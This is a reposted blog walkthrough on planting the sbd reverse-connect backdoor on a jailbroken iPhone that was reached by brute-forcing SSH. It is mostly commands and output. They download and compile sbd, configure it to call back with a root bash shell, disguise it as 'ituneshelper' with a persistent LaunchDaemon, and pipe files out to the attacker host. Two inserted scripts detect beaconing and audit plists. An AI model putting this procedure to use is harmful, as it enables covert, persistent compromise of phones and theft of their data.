Setting up a reverse-connect backdoor on an iPhone/iPad

Reposted from: http://www.freebuf.com/others/2158.html


Editor's note: sbd is a small backdoor with fairly strong encryption, the must-have item for home life, travel, robbery and murder (it is a security testing tool; do not use it illegally). Download: http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz

Local download:

During a penetration test I gained access to a jailbroken iPhone 4 by brute-forcing SSH. I then SSHed into the device and installed a persistent TCP reverse-connect backdoor (sbd-1.36 by Michel Blomgren).

All the steps in detail:

1. Install iphone-gcc:

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...

2. Download the sbd backdoor:

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43--  http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093      66.3K/s   in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------  3 1000 100    748 Sep 17  2004 ./
drwxr-x---  6 root wheel  272 Apr 23 23:50 ../
-rw-------  1 1000 100   1876 Sep 17  2004 CHANGES
-rw-------  1 1000 100  18007 Jun  8  2004 COPYING
-rw-------  1 1000 100   2176 Jun 20  2004 Makefile
-rw-------  1 1000 100   4880 Sep 11  2004 README
-rw-------  1 1000 100  31370 Jun 12  2004 aes.c
-rw-------  1 1000 100    549 Jun 11  2004 aes.h
drwx------  2 1000 100    136 Sep 11  2004 binaries/
-rw-------  1 1000 100     77 Jun  2  2004 doexec.c
-rw-------  1 1000 100   7114 Sep 11  2004 doexec_unix.h
-rw-------  1 1000 100  19060 Sep  8  2004 doexec_win32.h
-rw-------  1 1000 100  14968 Sep  9  2004 misc.h
-rwx------  1 1000 100    624 Jun 13  2004 mktarball.sh*
-rw-------  1 1000 100  13381 Sep  8  2004 pel.c
-rw-------  1 1000 100    898 Sep  9  2004 pel.h
-rw-------  1 1000 100   9829 Sep  9  2004 readwrite.h
-rw-------  1 1000 100  20557 Sep  9  2004 sbd.c
-rw-------  1 1000 100   2014 Jun  8  2004 sbd.h
-rw-------  1 1000 100   8900 Jun  2  2004 sha1.c
-rw-------  1 1000 100    436 Jun  2  2004 sha1.h
-rw-------  1 1000 100  20800 Sep  9  2004 socket_code.h

3. Configure sbd before compiling (I set sbd up as a daemon; every parameter, including the callback IP, port, password, encryption settings and so on, is set here):

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ":"
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
 * reconnect every 10 seconds.
 */

#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"

Alternatively, you can pass the same settings as command-line parameters:
host: ./sbd -l -p 443 -k 1234
server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443
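The RESPAWN_ENABLED / RESPAWN_INTERVAL settings above are also what gives the implant away on the network: a client that re-dials the same host and port every 10 seconds produces a near-constant inter-connection gap that no interactive user does. The following script is an added example, not part of the original post or of sbd itself; it runs a simple periodicity check over a constructed connection log. The log format ("time src -> dst:port"), the address 192.168.200.40 standing in for the device, and the jitter threshold are assumptions of the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed connection log (not real traffic) in the form "<ISO time> <src> -> <dst>:<port>".
# 192.168.200.40 stands in for the implanted device; 192.168.200.41 is ordinary browsing.
SAMPLE_LOG = """\
2012-04-24T02:20:00 192.168.200.40 -> 192.168.200.22:443
2012-04-24T02:20:03 192.168.200.41 -> 192.168.200.5:80
2012-04-24T02:20:10 192.168.200.40 -> 192.168.200.22:443
2012-04-24T02:20:20 192.168.200.40 -> 192.168.200.22:443
2012-04-24T02:20:27 192.168.200.41 -> 192.168.200.5:80
2012-04-24T02:20:30 192.168.200.40 -> 192.168.200.22:443
2012-04-24T02:20:40 192.168.200.40 -> 192.168.200.22:443
2012-04-24T02:20:50 192.168.200.40 -> 192.168.200.22:443
2012-04-24T02:21:15 192.168.200.41 -> 192.168.200.5:80
2012-04-24T02:21:41 192.168.200.41 -> 192.168.200.5:80
2012-04-24T02:23:02 192.168.200.41 -> 192.168.200.5:80
"""


def parse_line(line):
    """Parse one log line into (timestamp, src, dst, port)."""
    ts, src, _arrow, dst_port = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port)


def find_beacons(lines, min_hits=4, max_jitter=0.2):
    """Return (src, dst, port, hits, median_gap_seconds) for each flow whose
    inter-connection gaps are nearly constant: coefficient of variation
    (population stdev / median gap) at or below max_jitter.  A respawning
    reverse shell produces exactly that signature."""
    flows = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, port = parse_line(line)
        flows[(src, dst, port)].append(ts)

    beacons = []
    for (src, dst, port), times in flows.items():
        if len(times) < min_hits:          # too few connections to judge periodicity
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(gaps)
        if median <= 0:                    # bursts at the same second are not a beacon
            continue
        jitter = statistics.pstdev(gaps) / median
        if jitter <= max_jitter:
            beacons.append((src, dst, port, len(times), median))
    return beacons


if __name__ == "__main__":
    for src, dst, port, hits, gap in find_beacons(SAMPLE_LOG.splitlines()):
        print(f"beacon: {src} -> {dst}:{port}, {hits} connections, one every ~{gap:.0f}s")
```

Port 443 is chosen by the author precisely because it blends in, so the check deliberately keys on timing rather than on the port; on real firewall or NetFlow exports the same function applies once the line parser is adapted to the export format.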

4. Compilation:

iphone4:~/sbd-1.36 root# make
usage:
make unix     - Linux, NetBSD, FreeBSD, OpenBSD
make sunos    - SunOS (Solaris)
make win32    - native win32 console app (w/ Cygwin + MinGW)
make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw    - native win32 console app (w/ MinGW MSYS)
make mingwbg  - native win32 no-console app (w/ MinGW MSYS)
make cygwin   - Cygwin console app
make darwin   - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*

5. Set up the daemon (for persistence)

iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x  2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r--  1 root wheel 847 Feb 15  2011 com.openssh.sshd.plist
iphone4:/Library/LaunchDaemons root# cat <<EOF >> com.ituneshelper.start.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.ituneshelper.start</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/ituneshelper</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
  <key>StartInterval</key>
  <integer>1</integer>
</dict>
</plist>
EOF
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x  2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r--  1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r--  1 root wheel 847 Feb 15  2011 com.openssh.sshd.plist
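Seen from the defender's side, step 5 leaves clear artifacts on disk: a new plist in /Library/LaunchDaemons whose Label belongs to no installed package, a program path that dpkg does not own, and a StartInterval of one second combined with RunAtLoad. The script below is an added example (not from the original post) that audits a set of LaunchDaemon plists with Python's plistlib against a small baseline. The two plist bodies are constructed to match the listing above; the body of com.openssh.sshd.plist, and the baseline sets, are assumptions, since the page shows only the file names.

```python
import plistlib

# Constructed plists standing in for the two files listed in /Library/LaunchDaemons.
# Only the file names appear on the page; the sshd body below is an assumption.
SSHD_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.openssh.sshd</string>
<key>ProgramArguments</key><array><string>/usr/sbin/sshd</string><string>-i</string></array>
</dict></plist>"""

IMPLANT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.ituneshelper.start</string>
<key>ProgramArguments</key><array><string>/usr/bin/ituneshelper</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>1</integer>
</dict></plist>"""

# Constructed baseline. On a real device build it from a known-good image, or from
# `dpkg -S <program>` for every program path the plists reference.
KNOWN_LABELS = {"com.openssh.sshd"}
KNOWN_PROGRAMS = {"/usr/sbin/sshd"}


def audit_launch_daemon(filename, data, known_labels=KNOWN_LABELS,
                        known_programs=KNOWN_PROGRAMS, min_interval=60):
    """Return the reasons one LaunchDaemon plist deserves a look ([] = nothing found)."""
    pl = plistlib.loads(data)
    label = pl.get("Label", "")
    args = pl.get("ProgramArguments") or []
    program = pl.get("Program") or (args[0] if args else "")
    findings = []
    if label not in known_labels:
        findings.append(f"label {label!r} is not in the baseline")
    if program not in known_programs:
        findings.append(f"program {program!r} is not owned by a known package")
    if filename != f"{label}.plist":
        findings.append("file name does not match the Label key")
    interval = pl.get("StartInterval")
    if interval is not None and interval < min_interval:
        findings.append(f"StartInterval {interval}s restarts the program almost continuously")
    if pl.get("RunAtLoad") and interval is not None:
        findings.append("RunAtLoad together with StartInterval: survives reboot and kill")
    return findings


def audit_directory(plists):
    """plists maps file name -> plist bytes; returns only the entries with findings."""
    report = {}
    for name, data in plists.items():
        findings = audit_launch_daemon(name, data)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    listing = {"com.openssh.sshd.plist": SSHD_PLIST,
               "com.ituneshelper.start.plist": IMPLANT_PLIST}
    for name, findings in audit_directory(listing).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

On a device the dictionary would be filled by reading every file in /Library/LaunchDaemons (and /Library/LaunchAgents) instead of the inline bytes; the ps listing in step 6, where /usr/bin/ituneshelper runs as PID 94 under launchd, is the matching runtime check.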

6. Connect (from a Linux box):

root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
root@coresec:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
  UID   PID  PPID   C   STIME TTY       TIME CMD
    0     1     0   0 0:00.00 ??     0:00.95 /sbin/launchd
    0    19     1   0 0:00.00 ??     0:00.95 /usr/libexec/UserEventAgent -l System
    0    21     1   0 0:00.00 ??     0:00.68 /usr/sbin/notifyd
    0    23     1   0 0:00.00 ??     0:00.41 /usr/sbin/syslogd
    0    25     1   0 0:00.00 ??     0:01.64 /usr/libexec/configd
   25    27     1   0 0:00.00 ??     0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
  501    29     1   0 0:00.00 ??     0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
  501    33     1   0 0:00.00 ??     0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
    0    37     1   0 0:00.00 ??     0:00.81 /usr/libexec/lockdownd
    0    43     1   0 0:00.00 ??     0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
    0    49     1   0 0:00.00 ??     0:19.04 /usr/libexec/locationd
    0    55     1   0 0:00.00 ??     0:00.21 /usr/bin/sbsettingsd
    0    56     1   0 0:00.00 ??     0:00.69 /usr/sbin/wifid
  501    58     1   0 0:00.00 ??     0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
  501    71     1   0 0:00.00 ??     0:01.99 /usr/sbin/mediaserverd
  501    72     1   0 0:00.00 ??     0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
   65    73     1   0 0:00.00 ??     0:00.27 /usr/sbin/mDNSResponder -launchd
  501    75     1   0 0:00.00 ??     0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
  501    76     1   0 0:00.00 ??     0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
    0    78     1   0 0:00.00 ??     0:00.13 /usr/libexec/fseventsd
  501    79     1   0 0:00.00 ??     0:00.92 /usr/sbin/fairplayd.N90
  501    80     1   0 0:00.00 ??     0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
  501    86     1   0 0:00.00 ??     0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
  501    87     1   0 0:00.00 ??     0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
  501    92     1   0 0:00.00 ??     0:00.39 /usr/sbin/BTServer
  501    93     1   0 0:00.00 ??     0:00.99 /usr/sbin/aosnotifyd
    0    94     1   0 0:00.00 ??     0:00.02 /usr/bin/ituneshelper
    0   157     1   0 0:00.00 ??     0:00.11 /usr/libexec/networkd
  501   260     1   0 0:00.00 ??     0:01.94 /Applications/MobileMail.app/MobileMail
  501   261     1   0 0:00.00 ??     0:00.75 /Applications/MobilePhone.app/MobilePhone
    0   286    94   0 0:00.00 ??     0:00.03 bash
    0   300   286   0 0:00.00 ??     0:00.03 /bin/bash -i
    0   303   300   0 0:00.00 ??     0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

7. If you want to transfer files to or from the controlled iPhone, you can use sbd with the following parameters:

root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file
iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345

8. Removing the backdoor is just as simple:

iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper